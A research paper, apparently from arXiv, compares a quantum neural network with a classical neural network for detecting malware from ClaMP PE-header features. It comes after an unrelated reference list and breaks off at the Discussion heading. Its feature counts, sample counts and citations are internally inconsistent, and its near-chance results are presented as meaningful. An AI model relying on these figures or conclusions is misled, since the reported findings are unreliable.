The work is supported by the National Science Foundation under NSF Award #2209638, #2100115, #2209637, #2100134, #1663350. Any opinions, findings, and recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the National Science Foundation.

REFERENCES

[1] T. D. LaToza, G. Venolia, and R. DeLine, "Maintaining mental models: a study of developer work habits," in Proceedings of the 28th international conference on Software engineering, pp. 492–501, 2006.
[2] T. Manikandan, B. Balamurugan, C. Senthilkumar, R. R. A. Harinarayan, and R. R. Subramanian, "Cyberwar is coming," Cyber Security in Parallel and Distributed Computing: Concepts, Techniques, Applications and Case Studies, pp. 79–89, 2019.
[3] A. Arora and R. Telang, "Economics of software vulnerability disclosure," IEEE security & privacy, vol. 3, no. 1, pp. 20–25, 2005.
[4] K. Jochem, "It security matters,"
[5] "cisa." https://www.cisa.gov/news-events/alerts/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability, 2022. Accessed April 26, 2023.
[6] T. N. Brooks, "Survey of automated vulnerability detection and exploit generation techniques in cyber reasoning systems," in Science and Information Conference, pp. 1083–1102, Springer, 2018.
[7] C. Cadar, D. Dunbar, D. R. Engler, et al., "Klee: unassisted and automatic generation of high-coverage tests for complex systems programs," in OSDI, vol. 8, pp. 209–224, 2008.
[8] T. A. Henzinger, R. Jhala, R. Majumdar, and G. Sutre, "Software verification with blast," in International SPIN Workshop on Model Checking of Software, pp. 235–239, Springer, 2003.
[9] S. M. Ghaffarian and H. R. Shahriari, "Software vulnerability analysis and discovery using machine-learning and data-mining techniques: A survey," ACM Computing Surveys (CSUR), vol. 50, no. 4, pp. 1–36, 2017.
[10] A. Younis, Y. Malaiya, C. Anderson, and I. Ray, "To fear or not to fear that is the question: Code characteristics of a vulnerable function with an existing exploit," in Proceedings of the sixth ACM conference on data and application security and privacy, pp. 97–104, 2016.
[11] Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, "Evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities," IEEE transactions on software engineering, vol. 37, no. 6, pp. 772–787, 2010.
[12] H. Perl, S. Dechand, M. Smith, D. Arp, F. Yamaguchi, K. Rieck, S. Fahl, and Y. Acar, "Vccfinder: Finding potential vulnerabilities in open-source projects to assist code audits," in Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, pp. 426–437, 2015.
[13] M. Allamanis, E. T. Barr, P. Devanbu, and C. Sutton, "A survey of machine learning for big code and naturalness," ACM Computing Surveys (CSUR), vol. 51, no. 4, pp. 1–37, 2018.
[14] S. Wang, D. Chollak, D. Movshovitz-Attias, and L. Tan, "Bugram: bug detection with n-gram language models," in Proceedings of the 31st IEEE/ACM International Conference on Automated Software Engineering, pp. 708–719, 2016.
[15] G. Grieco, G. L. Grinblat, L. Uzal, S. Rawat, J. Feist, and L. Mounier, "Toward large-scale vulnerability discovery using machine learning," in Proceedings of the Sixth ACM Conference on Data and Application Security and Privacy, pp. 85–96, 2016.
[16] P. Zeng, G. Lin, L. Pan, Y. Tai, and J. Zhang, "Software vulnerability analysis and discovery using deep learning techniques: A survey," IEEE Access, vol. 8, pp. 197158–197172, 2020.
[17] Y. Zhou, S. Liu, J. Siow, X. Du, and Y. Liu, "Devign: Effective vulnerability identification by learning comprehensive program semantics via graph neural networks," Advances in neural information processing systems, vol. 32, 2019.
[18] D. Iorga, D.-G. Corlatescu, O. Grigorescu, C. Sandescu, M. Dascalu, and R. Rughinis, "Yggdrasil—early detection of cybernetic vulnerabilities from twitter," in 2021 23rd International Conference on Control Systems and Computer Science (CSCS), pp. 463–468, IEEE, 2021.
[19] C. Sauerwein and A. Pfohl, "Towards automated classification of attackers' ttps by combining nlp with ml techniques," arXiv preprint arXiv:2207.08478, 2022.
[20] J. A. Harer, L. Y. Kim, R. L. Russell, O. Ozdemir, L. R. Kosta, A. Rangamani, L. H. Hamilton, G. I. Centeno, J. R. Key, P. M. Ellingwood, et al., "Automated software vulnerability detection with machine learning," arXiv preprint arXiv:1803.04497, 2018.
[21] M. Pistoia, S. Chandra, S. J. Fink, and E. Yahav, "A survey of static analysis methods for identifying security vulnerabilities in software systems," IBM systems journal, vol. 46, no. 2, pp. 265–288, 2007.
[22] R. Russell, L. Kim, L. Hamilton, T. Lazovich, J. Harer, O. Ozdemir, P. Ellingwood, and M. McConley, "Automated vulnerability detection in source code using deep representation learning," in 2018 17th IEEE international conference on machine learning and applications (ICMLA), pp. 757–762, IEEE, 2018.
[23] A. Ahmed and M. A. Yousuf, "Sentiment analysis on bangla text using long short-term memory (lstm) recurrent neural network," in Proceedings of International Conference on Trends in Computational and Cognitive Engineering, pp. 181–192, Springer, 2021.
[24] J. Pennington, R. Socher, and C. D. Manning, "Glove: Global vectors for word representation," in Proceedings of the 2014 conference on empirical methods in natural language processing (EMNLP), pp. 1532–1543, 2014.
[25] V. Gaikwad and Y. Haribhakta, "Adaptive glove and fasttext model for hindi word embeddings," in Proceedings of the 7th ACM IKDD CoDS and 25th COMAD, pp. 175–179, 2020.
[26] M. S. Akter, H. Shahriar, R. Chowdhury, and M. Mahdy, "Forecasting the risk factor of frontier markets: A novel stacking ensemble of neural network approach," Future Internet, vol. 14, no. 9, p. 252, 2022.
[27] S. Hochreiter and J. Schmidhuber, "Long short-term memory," Neural computation, vol. 9, no. 8, pp. 1735–1780, 1997.
[28] M. S. Akter, H. Shahriar, N. Ahmed, and A. Cuzzocrea, "Deep learning approach for classifying the aggressive comments on social media: Machine translated data vs real life data," in 2022 IEEE International Conference on Big Data (Big Data), pp. 5646–5655, 2022.
[29] M. S. Akter, H. Shahriar, and Z. A. Bhuiya, "Automated vulnerability detection in source code using quantum natural language processing," in Ubiquitous Security: Second International Conference, UbiSec 2022, Zhangjiajie, China, December 28–31, 2022, Revised Selected Papers, pp. 83–102, Springer, 2023.
[30] Y. Wang, M. Huang, X. Zhu, and L. Zhao, "Attention-based lstm for aspect-level sentiment classification," in Proceedings of the 2016 conference on empirical methods in natural language processing, pp. 606–615, 2016.
[31] M. S. Akter, H. Shahriar, A. Cuzzocrea, N. Ahmed, and C. Leung, "Handwritten word recognition using deep learning approach: A novel way of generating handwritten words," in 2022 IEEE International Conference on Big Data (Big Data), pp. 5414–5423, 2022.
[32] H. Nguyen, K. P. Tran, S. Thomassey, and M. Hamad, "Forecasting and anomaly detection approaches using lstm and lstm autoencoder techniques with the applications in supply chain management," International Journal of Information Management, vol. 57, p. 102282, 2021.
[33] K. W. Church, "Word2vec," Natural Language Engineering, vol. 23, no. 1, pp. 155–162, 2017.
[34] J. Devlin, M.-W. Chang, K. Lee, and K. Toutanova, "Bert: Pre-training of deep bidirectional transformers for language understanding," arXiv preprint arXiv:1810.04805, 2018.
[35] R. Dale, "Gpt-3: What's it good for?," Natural Language Engineering, vol. 27, no. 1, pp. 113–118, 2021.
[36] D. S. Depto, S. Rahman, M. M. Hosen, M. S. Akter, T. R. Reme, A. Rahman, H. Zunair, M. S. Rahman, and M. Mahdy, "Automatic segmentation of blood cells from microscopic slides: a comparative analysis," Tissue and Cell, vol. 73, p. 101653, 2021.
[37] M. S. Akter, M. J. H. Faruk, N. Anjum, M. Masum, H. Shahriar, N. Sakib, A. Rahman, F. Wu, and A. Cuzzocrea, "Software supply chain vulnerabilities detection in source code: Performance comparison between traditional and quantum machine learning algorithms," in 2022 IEEE International Conference on Big Data (Big Data), pp. 5639–5645, IEEE, 2022.
[38] M. S. Akter, H. Shahriar, S. Sneha, and A. Cuzzocrea, "Multi-class skin cancer classification architecture based on deep convolutional neural network," in 2022 IEEE International Conference on Big Data (Big Data), pp. 5404–5413, IEEE, 2022.
[39] P. F. de la Foret, S. Ruseti, C. Sandescu, M. Dascalu, and S. Travadel, "Interpretable identification of cybersecurity vulnerabilities from news articles," in Proceedings of the International Conference on Recent Advances in Natural Language Processing (RANLP 2021), pp. 428–436, 2021.
[40] V. Behzadan, C. Aguirre, A. Bose, and W. Hsu, "Corpus and deep learning classifier for collection of cyber threat indicators in twitter stream," in 2018 IEEE International Conference on Big Data (Big Data), pp. 5002–5007, IEEE, 2018.
2306.08060

Software Supply Chain Vulnerabilities Detection in Source Code: Performance Comparison between Traditional and Quantum Machine Learning Algorithms

Mst Shapna Akter∗, Md Jobair Hossain Faruk∗, Nafisa Anjum†, Mohammad Masum§, Hossain Shahriar†, Akond Rahman¶, Fan Wu††, Alfredo Cuzzocrea∥
∗Department of Computer Science, Kennesaw State University, USA
†Department of Information Technology, Kennesaw State University, USA
§Department of Applied Data Science, San Jose State University, USA
¶Department of Computer Science and Software Engineering, Auburn University, USA
††Department of Computer Science, Tuskegee University, USA
∥iDEA Lab, University of Calabria, Rende, Italy
{makter2, mhossa21, nanjum}@students.kennesaw.edu | {hshahria}@kennesaw.edu | mohammad.masum@sjsu.edu | akond@auburn.edu | fwu@tuskegee.edu | alfredo.cuzzocrea@unical.it

Abstract— The software supply chain (SSC) attack has become one of the crucial issues that are increasing rapidly with the advancement of the software development domain. In general, SSC attacks executed during the software development process lead to vulnerabilities in software products, targeting downstream customers and even involved stakeholders. Machine learning approaches are proven in detecting and preventing software security vulnerabilities, and emerging quantum machine learning can be promising in addressing SSC attacks. Considering the distinction between traditional and quantum machine learning, performance can vary with the proportion of the experimental dataset. In this paper, we conduct a comparative analysis between quantum neural networks (QNN) and conventional neural networks (NN) with a software supply chain attack dataset known as ClaMP. Our goal is to distinguish the performance between QNN and NN; to conduct the experiment, we develop two different models for QNN and NN by utilizing Pennylane for quantum and TensorFlow and Keras for traditional, respectively. We evaluated the performance of both models with different proportions of the ClaMP dataset to identify the F1 score, recall, precision, and accuracy. We also measured the execution time to check the efficiency of both models. The results indicate that the execution time for QNN is slower than for NN with a higher percentage of the dataset. Due to recent advancements in QNN, a large level of experiments shall be carried out to understand both models accurately in our future research.

Keywords— Software supply chain security, Quantum machine learning, Quantum neural network (QNN), Neural network (NN), ClaMP, TensorFlow, Pennylane

I. INTRODUCTION

In recent years, threats to software supply chain security have evolved gradually. For analyzing threat patterns and detecting and predicting security vulnerabilities and suspicious behaviors of software security threats, machine learning (ML) has long been adopted as a powerful approach [1], [2]. Due to the vast level of data stored globally, which is increasing enormously by 20% every year, finding innovative machine learning approaches is needed for proactive prevention and early detection of security threats [3], [4]. Quantum machine learning (QML), with the help of quantum random access memory (QRAM), has this potential, and scores of research institutions are exploiting the promising QML to deal with large amounts of data [5]–[8]. In general, quantum machine learning refers to an integrated field of quantum computing, quantum algorithms, and classical machine learning in which algorithms are developed to address real-world machine learning problems [32], [33] by leveraging the efficiency and concepts of quantum computing [9], [10].

The fundamental concepts of quantum machine learning, including quantum coherence, superposition, and entanglement, provide quantum computers with immense power to process and handle data in a way that leads toward the emerging implementation of quantum computing in technological fields [11], [12]. In contrast to conventional computing, the basic unit of quantum computing, known as the qubit, can make use of both the values 0 and 1 in order to follow various paths of computation simultaneously [13]. Mathematically, a qubit state is a vector in two-dimensional space, illustrated by the linear combination of the two basis states (|0⟩ and |1⟩) in a quantum system: |ψ⟩ = α|0⟩ + β|1⟩, where α, β ∈ ℂ are probability amplitudes required to satisfy |α|² + |β|² = 1 [14]. Such a combination of basis states is described as quantum superposition, and correlations between two qubits through a quantum phenomenon are termed entanglement.

With the ever-growing size of data, the number of sophisticated and complicated cyberattacks and data violations, such as software supply chain attacks and network intrusion attacks, is also increasing rapidly around the globe. A software supply chain (SSC) attack occurs through penetration of a vendor's network and insertion of malicious code by a cyber threat actor, which jeopardizes the software before the vendor distributes it to customers [15], [16]. SSC attacks affect the software development, dissemination, and utilization phases and are becoming extremely critical due to the excessive complication of software development strategies over the years [17]. Such attacks occur during the production phase, causing vulnerabilities for downstream consumers. SSC attacks can also disrupt newly developed software through patches or hotfixes, or even from the outset, thus compromising the system from the start. Hence, SSC attacks can have a significant negative impact on software users in all sectors by gaining complete control over a software's regular functionality. Hijacking updates, undermining code signing, and compromising open-source code are common techniques used by threat actors to execute SSC attacks [15], [34].

Regarding the recognition and investigation of SSC attacks, there is an absence of sufficient information concerning mitigating or preventing these risks. A network intrusion attack, on the other hand, is an attempt to compromise the security of information or data stored on a computer connected to the network. Two distinct types of activities fall under this definition. First, an attacker can gain unauthorized access to a network, files, or information to steal sensitive data, leaving the data unharmed. Second, an attacker can attempt to gain unauthorized access to user devices, resources, or servers to destabilize the entire network by encrypting, deleting, mishandling, or simply modifying the data [18]. To combat such complex, unlawful, and unauthorized attacks, interest grows in preventing attacks using a quantum machine learning-based paradigm [19]–[21].

In past years, little to no research was conducted on software supply chain vulnerability datasets using quantum machine learning, perhaps due to the limited availability of quantum computing resources. However, among currently available QML platforms, Pennylane, for instance, offers programming of quantum computers that enables a new paradigm termed quantum differentiable programming and provides seamless collaboration with other QML tools, including IBM Quantum, NumPy, and TensorFlow Quantum. The main ideology of these applications is flexibility, which speeds up the know-how needed to distinguish between various quantum devices and choose the finest algorithm for the task. This paper conducts a comparative analysis between quantum neural networks (QNN) and conventional neural networks (NN) by utilizing a software supply chain attack dataset known as ClaMP. The primary contributions of this research are as follows:

• We adopt both quantum machine learning and conventional machine learning to conduct an experiment on a software supply chain attack dataset.
• We provide a comparative analysis of the performance of both QML and ML based on the findings of experiments using different proportions of the dataset.

We organize the rest of the paper as follows: In Section II, we provide a brief related study on quantum machine learning and traditional machine learning. Section III explains the methodology we adopted for our comparative research. The experimental settings and results are explained in Section IV, which includes dataset specification and processing. Section V discusses the findings of this paper. Finally, Section VI concludes the paper.
II. RELATED WORK

Addressing the constraints of traditional machine learning methods, researchers are interested in the newly emerging quantum machine learning approach for detecting and preventing software and cybersecurity vulnerabilities [1]. Various machine learning techniques, including neural networks, naïve Bayes, logistic regression, convolutional neural networks (CNN), decision trees, and support vector machines, have been successfully applied for classifying software security activities, including malware, ransomware, and network intrusion detection [22]–[24].

Christopher Havenstein et al. [25] presented a comparative study of the performance of quantum machine learning (QML) and classical machine learning (ML). The authors worked on QML algorithms with reproducible code and similar code for ML. Quantum variational support vector machines were then adopted, which show higher accuracy than classical support vector machines. In conclusion, the researchers emphasize the future potential of quantum multi-class SVM classifiers.

Luis E. Herrera Rodríguez et al. [31] presented a comparative study of various machine learning methods for dissipative quantum dynamics, in which the authors utilized 22 ML models to predict the long-time dynamics of quantum systems. The models include convolutional and fully connected feed-forward artificial neural networks (ANNs) and kernel ridge regression (KRR).

Mohammad Masum et al. [26] conducted research on quantum machine learning (QML) to detect software supply chain attacks [1]. The researchers analyzed the performance of quantum computing by applying several novel approaches, including the quantum support vector machine (QSVM) and the quantum neural network (QNN). Utilizing both methods, the authors detected software supply chain attacks in open-source quantum simulators, such as IBM Qiskit and TensorFlow Quantum. According to the research findings, quantum machine learning surpasses classical machine learning in terms of processing speed and computational time.
MJH Faruk et al. studied quantum cybersecurity from both threat and opportunity perspectives. The authors provided a comprehensive review of state-of-the-art quantum computing-based cybersecurity approaches. The research indicated that quantum computing can be utilized to address software security, cybersecurity, and cryptography-related concerns. On the other hand, malicious individuals can also misuse quantum computing against software infrastructure due to the immense power of quantum computers [27].

III. METHODOLOGY

We adopt the quantum neural network (QNN), a subfield of quantum machine learning (QML), for this research and apply the model to the ClaMP dataset. Figure 1 demonstrates the framework representing the implementation process.

[Figure 1: Process of the architecture of the framework]

At first, we pre-process the raw data prior to providing it as input to the QML model. We used Python and the shuffle function of the Scikit-Learn (sklearn) library for data preprocessing, along with the index-reset and drop functions from the pandas library and the label encoder from the sklearn library. In order to maintain a balanced number of classes and to avoid imbalanced classes that may lead to wrong predictions, we checked all of the separated portions of the dataset created from ClaMP; for the experiment, we consider only the balanced portions of the dataset. After applying the shuffle function, we reset the index to organize the dataset in ascending order. The drop function is used to remove columns that are unnecessary and do not contribute to the prediction. Quantum machine learning models must be fed numerical values, so the categorical values were converted into numerical values, and all the numerical values were normalized to maintain a similar scale.
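As a rough illustration of the preprocessing just described, the following Python sketch shuffles the data, resets the index, drops a non-predictive column, label-encodes a categorical feature, and standardizes the numeric features. The file name and the column names ("e_magic", "packer_type", "class") are illustrative assumptions, not the exact ClaMP schema.

# Minimal sketch of the preprocessing pipeline, assuming hypothetical
# file/column names; the paper does not publish its exact code.
import pandas as pd
from sklearn.preprocessing import LabelEncoder, StandardScaler
from sklearn.utils import shuffle

df = pd.read_csv("ClaMP_Integrated.csv")            # hypothetical file name
df = shuffle(df, random_state=42).reset_index(drop=True)
df = df.drop(columns=["e_magic"])                   # drop a non-predictive column (illustrative)

le = LabelEncoder()                                 # categorical -> numeric
df["packer_type"] = le.fit_transform(df["packer_type"].astype(str))

X = df.drop(columns=["class"]).values               # "class" assumed to be the label column
y = df["class"].values
X = StandardScaler().fit_transform(X)               # zero mean, unit variance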
After the preprocessing steps, we split the entire dataset, comprising 5,210 rows, into smaller portions. We separated the dataset into 20 smaller datasets; the number of rows started from 5 percent of the total dataset and gradually increased by 5 percent up to 100 percent. The quantum machine learning model was applied to each of the separated portions of the dataset. Before feeding them into the QML model, the features were encoded into quantum states. We provide a comparative analysis of the performance of both QML and ML based on the findings of the experiments using different proportions of the dataset.
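A minimal sketch of this splitting step, assuming the X and y arrays from the preprocessing sketch above: stratified subsampling keeps the class proportion in each increment, mirroring the 20 portions described in the text.

# Carve the shuffled dataset into 5%, 10%, ..., 100% portions while
# preserving the class balance (stratified subsampling).
from sklearn.model_selection import train_test_split

portions = {}
for pct in range(5, 101, 5):
    if pct == 100:
        X_p, y_p = X, y
    else:
        # stratify=y keeps the class proportion inside the subsample
        X_p, _, y_p, _ = train_test_split(
            X, y, train_size=pct / 100, stratify=y, random_state=42)
    portions[pct] = (X_p, y_p)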
Quantum neural networks (QNN) come from neurocomputing theory, which converges with machine learning, quantum computing, and artificial neural network concepts [28]. The QNN framework can be applied to neural computing over vast datasets to find the expected result. Before processing data through the QNN, the input data is encoded into a suitable qubit state with a proper number of qubits [29]. Later, the qubit state is modified for a specific number of layers using two kinds of gates, parameterized rotation gates and entangling gates, where the expected value of a Hamiltonian operator (Pauli gates, for instance) is used to direct the altered qubit state. The results derived from the Pauli gates are decoded and translated into applicable output data. A variational quantum circuit-based neural network plays various roles in a QNN. The Adam optimizer updates the parameters against criteria including complexity-theoretic measurements of size, depth, accuracy, and definite features, while a number of steps is necessary for solving the issue of in-depth measurement. Precision describes the setup required to solve a number of challenges. A quantum neural network consists of three items: input, output, and L hidden layers, where each hidden layer consists of a quantum circuit of quantum perceptrons, which acts on an initial state of the input qubits and produces a mixed state for the output qubits. A QNN is also able to do the quantum computation for a two-input or one-input qubit perceptron, which goes through quantum-circuit construction with quantum perceptrons on 4-level qubits. The most comprehensive quantum perceptron implements any quantum channel on the input qubits.

The precision p(n) is denoted by {s(n), d(n)}, where size is denoted by s(n) and depth is denoted by d(n). The number of qubits in the circuit is measured by the size, while the longest sequence of gates from input to output is measured by the depth. The size and depth are created from gates D and U of precision p(n); a reversible U gate is usually followed by the D gate to eliminate the localization problem. The accuracy of the circuits is denoted by O{s(n)}.

IV. EXPERIMENT & RESULTS

In this section, we present both the experiments and the results. We first provide details of the dataset specification, followed by data processing. In order to explain an effective experiment, we define the experimental settings, where we utilize accuracy, precision, recall, and F-score metrics for evaluating the models' performance. Lastly, we present the experimental results.

A. Dataset Specification

We applied the quantum neural network (QNN) to the ClaMP dataset for malware classification. The ClaMP dataset has two versions, ClaMP_raw and ClaMP_Integrated. The raw malware instances were aggregated from VirusShare, while the benign instances were integrated from Windows files. Portable executable (PE) headers contain the information required for the OS to run executable files; therefore, features were collected from the PE headers of malware and benign samples. Hence, various raw features, such as file header (7 features), DOS header (19 features), and optional header (29 features), were extracted from the PE headers of the samples using a rule-based method. Later, meaningful features were derived from the raw features, including entropy, compilation time, and section time. Additionally, more information about the PE file was extracted by expanding a set of raw features from the file header. Finally, we selected three types of features (raw, derived, and expanded) from the ClaMP_Integrated dataset, which contains a total of 68 features: 28 raw, 26 expanded, and 14 derived features, respectively [30].

B. Data Preprocessing

We applied QNN to the ClaMP dataset, where we utilized various data sizes to inspect the comparative performance of the experimented method. We first considered the entire dataset, containing 5,210 samples, followed by randomly selected portions starting at 5 percent of the dataset, without replacing any instances, gradually increasing the percentage by 5 percent: 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, and finally 95 percent, with 260, 521, 782, 1042, 1302, 1563, 1834, 2084, 2345, 2605, 2866, 3126, 3387, 3647, 3908, 4168, 4429, 4689, and 4950 samples, respectively, while preserving the class proportion. We converted the categorical values from the feature called 'packer type' of ClaMP, since this type of data cannot be directly entered into the model. The dataset contains a total of 108 columns, including one target variable. We used a standardization technique to transform all the features to a mean of zero and a standard deviation of one.

C. Experimental Settings

The present quantum simulator does not accept large dimensions as input, while our dataset contains 108 dimensions, which we cannot feed into the simulator. Hence, we adopted a dimension reduction technique called principal component analysis (PCA). PCA was applied to the 108-feature vectors of the ClaMP dataset to reduce the dimension, and we selected the first 16 principal components due to the limitation on qubit numbers in the existing simulator. First, the classical NN was directly applied to the reduced dataset. The next step was encoding the classical data as quantum circuits, which means converting all the features' values into qubit values for processing on the quantum computer.
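The dimension reduction and the quantum-state encoding could look roughly as follows. The 4x4 qubit grid, the clipping, and the rx angle encoding are assumptions made for illustration; the paper does not publish its circuit construction.

# Sketch: reduce the 108 standardized features to 16 principal components
# (one per simulated qubit), then angle-encode each component as a
# single-qubit rotation with cirq.
import cirq
import numpy as np
from sklearn.decomposition import PCA

pca = PCA(n_components=16)
X_16 = pca.fit_transform(X)                      # shape: (n_samples, 16)
X_16 = np.clip(X_16, -1.0, 1.0)                  # keep rotation angles bounded (simplification)

qubits = cirq.GridQubit.rect(4, 4)               # 16 simulated qubits

def encode(sample):
    """Map one 16-dimensional sample to a data circuit of rx rotations."""
    return cirq.Circuit(
        cirq.rx(np.pi * value)(qubit) for value, qubit in zip(sample, qubits))

data_circuits = [encode(s) for s in X_16]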
[Figure 2: The quantum neural network with the input parameter and linear entanglement structure]

Figure 2 demonstrates the circuit created for a random sample. The circuits were converted into TensorFlow Quantum (TFQ). Next, a model circuit layer was developed for the QNN, comprising a two-layer model matched to the size of the data circuit, and the model circuit was finally wrapped in a TFQ Keras model. We converted the quantum data and fed it to the model, using a parametrized quantum layer to train the model circuit on the quantum data. We adopted an optimization objective known as hinge loss during the training phase, and the labels were converted to the range -1 to 1. Finally, we trained the QNN for 100 epochs.
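A hedged sketch of this training setup, continuing the encoding sketch above: a two-layer parameterized model circuit wrapped in tfq.layers.PQC inside a Keras model, hinge loss on labels mapped to ±1, and 100 epochs. The specific gate layout and readout operator are assumptions, since the paper reports only the overall structure.

# Two-layer parameterized circuit + linear entanglement, wrapped in a
# TFQ-Keras model and trained with hinge loss (sketch, not the authors' code).
import sympy
import tensorflow as tf
import tensorflow_quantum as tfq

def model_circuit(qubits):
    symbols = sympy.symbols("theta0:32")         # 16 qubits x 2 layers
    circuit = cirq.Circuit()
    for layer in range(2):
        for i, q in enumerate(qubits):
            circuit += cirq.ry(symbols[16 * layer + i])(q)
        for q0, q1 in zip(qubits, qubits[1:]):   # linear entanglement
            circuit += cirq.CNOT(q0, q1)
    return circuit

readout = cirq.Z(qubits[-1])                     # measure the last qubit (assumption)
qnn = tf.keras.Sequential([
    tf.keras.layers.Input(shape=(), dtype=tf.string),
    tfq.layers.PQC(model_circuit(qubits), readout),
])
qnn.compile(loss=tf.keras.losses.Hinge(),
            optimizer=tf.keras.optimizers.Adam())

x_train = tfq.convert_to_tensor(data_circuits)   # serialized circuits
y_train = 2.0 * y - 1.0                          # {0,1} -> {-1,+1} for hinge loss
qnn.fit(x_train, y_train, epochs=100, verbose=0)

Hinge loss is the natural pairing here because the PQC readout is an expectation value in [-1, 1], which is why the labels are remapped to ±1 before training.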
D. Experimental Results: Quantum Neural Network (QNN)

Our comparative analysis between the classical neural network (NN) model and the quantum neural network (QNN) model is illustrated in Table 1 and Table 2, comprising twenty different portions of the ClaMP dataset. The results derived from the quantum neural network model show that the accuracy is random across the different portions of the dataset. For instance, for 5 percent of the dataset, the accuracy is 57 percent, the F1 score is 73 percent, precision is 100 percent, and recall is 57 percent, while for 20 percent of the dataset, the accuracy is 28 percent, the F1 score is 28 percent, recall is 28 percent, and precision is 30 percent. Even as the dataset grows slowly, the performance of the model can drop significantly in terms of accuracy: the accuracy jumps across 30, 35, 40, and 45 percent and drops off at 50 percent of the dataset. The accuracy for 30, 35, 40, 45, and 50 percent of the data is 53, 65, 60, 73, and 45 percent, respectively. For some larger portions of the data (60, 70, 85, and 90 percent), accuracy is remarkably low, at 40, 50, 45, and 48 percent, respectively, while for data proportions of 65, 75, 80, 95, and 100 percent, accuracy is comparatively high, at 57, 70, 53, 55, and 53 percent, respectively. Considering all of the experiments, the findings indicate that the accuracy is random on different portions of the dataset: the number of instances does not affect the accuracy, while it does affect the total execution time.

Table 1: Comparative analysis of the different portions of the ClaMP dataset using the quantum machine learning model (QNN)

Data percentage   Precision   Recall   F1-score   Accuracy   Execution time
5                 1.00        0.57     0.73       0.57       12min 24s
10                0.42        0.35     0.37       0.35       11min 42s
15                0.68        0.55     0.58       0.55       9min 48s
20                0.30        0.28     0.28       0.28       9min 22s
25                0.64        0.47     0.53       0.48       9min 53s
30                0.87        0.53     0.61       0.53       9min 28s
35                0.92        0.65     0.72       0.65       10min 23s
40                0.89        0.60     0.65       0.60       9min 36s
45                0.83        0.72     0.74       0.73       9min 45s
50                0.86        0.45     0.59       0.45       9min 30s
55                0.86        0.50     0.63       0.50       10min 35s
60                0.67        0.40     0.50       0.40       9min 20s
65                0.82        0.57     0.68       0.57       9min 45s
70                0.80        0.50     0.62       0.50       9min 19s
75                0.90        0.70     0.74       0.70       9min 42s
80                0.85        0.53     0.63       0.53       9min 40s
85                0.82        0.45     0.51       0.45       10min 21s
90                0.86        0.47     0.61       0.48       10min 7s
95                0.87        0.55     0.67       0.55       10min 24s
100               0.93        0.53     0.67       0.53       11min 21s

Considering the experimental results, the total required execution time is higher when the number of instances is smaller; the execution time then starts to decrease as the number of instances increases, up to a certain threshold. When the data proportion crosses that threshold, the required time gradually starts to increase again. Table 1 shows that for 5 percent and 10 percent of the total dataset, the execution times are 12min 24s and 11min 42s, respectively. From 15 percent to 80 percent of the dataset, except for 35 percent and 55 percent, the execution time remains between 9min 19s and 9min 48s. From 85 to 100 percent of the data, the execution time increases from 10 min to 11 min. Observing the quantum neural network experiments on different portions of the data, we found that the data proportion does not affect the model's accuracy, but the execution time varies with different proportions of the dataset.
E. Experimental Results: Traditional Neural Network (NN)

The results derived from the conventional neural network model are similar to those of the quantum neural network in terms of the accuracy metric, as the accuracy is random in different portions of the dataset. Considering 5 percent of the dataset, the accuracy is 50 percent, the F1 score is 67 percent, the precision is 100 percent, and the recall is 50 percent; for 10 percent of the dataset, the accuracy is 46 percent, the F1 score is 63 percent, the precision is 100 percent, and the recall is 46 percent; for 15 percent of the dataset, the accuracy is 54 percent, the F1 score is 70 percent, the precision is 100 percent, and the recall is 54 percent. This means that for the smallest portion of the dataset the accuracy is 50 percent; after increasing the data by 5 percent, the accuracy drops by 4 percentage points to 46 percent; and after increasing the data percentage by 10 percent, the accuracy rises to 54 percent. For the large proportions of the dataset (80, 85, 90, 95, and 100 percent), the accuracy values are 53, 52, 54, 53, and 53 percent, respectively.

Table 2: Comparative analysis of the different portions of the ClaMP dataset using the classical machine learning model (NN)

Data percentage   Precision   Recall   F1-score   Accuracy   Execution time
5                 1.00        0.50     0.67       0.50       22.1s
10                1.00        0.46     0.63       0.46       15.2s
15                1.00        0.54     0.70       0.54       19.8s
20                1.00        0.48     0.65       0.48       44s
25                1.00        0.47     0.64       0.47       26.8s
30                1.00        0.52     0.69       0.52       41.9s
35                1.00        0.58     0.74       0.58       36.4s
40                1.00        0.49     0.66       0.49       42.3s
45                1.00        0.48     0.65       0.48       46.3s
50                1.00        0.54     0.70       0.54       1min 23s
55                1.00        0.53     0.70       0.53       1min 22s
60                1.00        0.51     0.68       0.51       51.1s
65                1.00        0.55     0.71       0.55       53.6s
70                1.00        0.55     0.71       0.55       1min 19s
75                1.00        0.52     0.68       0.52       1min 13s
80                1.00        0.53     0.70       0.53       1min 16s
85                1.00        0.52     0.69       0.52       1min 22s
90                1.00        0.54     0.70       0.54       1min 23s
95                1.00        0.53     0.69       0.53       1min 17s
100               1.00        0.52     0.68       0.53       1min 25s

Analyzing the experimental results, the accuracy does not follow any pattern: it neither decreases nor increases consistently with different proportions of the dataset, but instead gives a very unpredictable and random result. Therefore, the different proportions of the dataset do not have any impact on the model's performance in terms of the accuracy metrics. However, in terms of total execution time, different portions of the dataset significantly affect the neural network model. We observed that for smaller portions, namely 5, 10, 15, 20, 25, 30, 35, 40, and 45 percent of the total dataset, the execution times required are 22.1s, 15.2s, 19.8s, 44s, 26.8s, 41.9s, 36.4s, 42.3s, and 46.3s, respectively. For 50, 55, 70, 75, 80, 85, 90, 95, and 100 percent of the total dataset, the execution times required are 1min 23s, 1min 22s, 1min 19s, 1min 13s, 1min 16s, 1min 22s, 1min 23s, 1min 17s, and 1min 25s, respectively.
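For the classical baseline, the execution times in Table 2 can be reproduced in spirit by timing model.fit on the 16 PCA features. The layer sizes below are assumptions, since the paper does not report the NN architecture.

# Sketch of the classical NN baseline with wall-clock timing around training.
import time
import tensorflow as tf

nn = tf.keras.Sequential([
    tf.keras.layers.Input(shape=(16,)),
    tf.keras.layers.Dense(32, activation="relu"),   # layer sizes are assumptions
    tf.keras.layers.Dense(1, activation="sigmoid"),
])
nn.compile(loss="binary_crossentropy", optimizer="adam", metrics=["accuracy"])

start = time.perf_counter()
nn.fit(X_16, y, epochs=100, verbose=0)
print(f"execution time: {time.perf_counter() - start:.1f}s")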
V. DISCUSSION

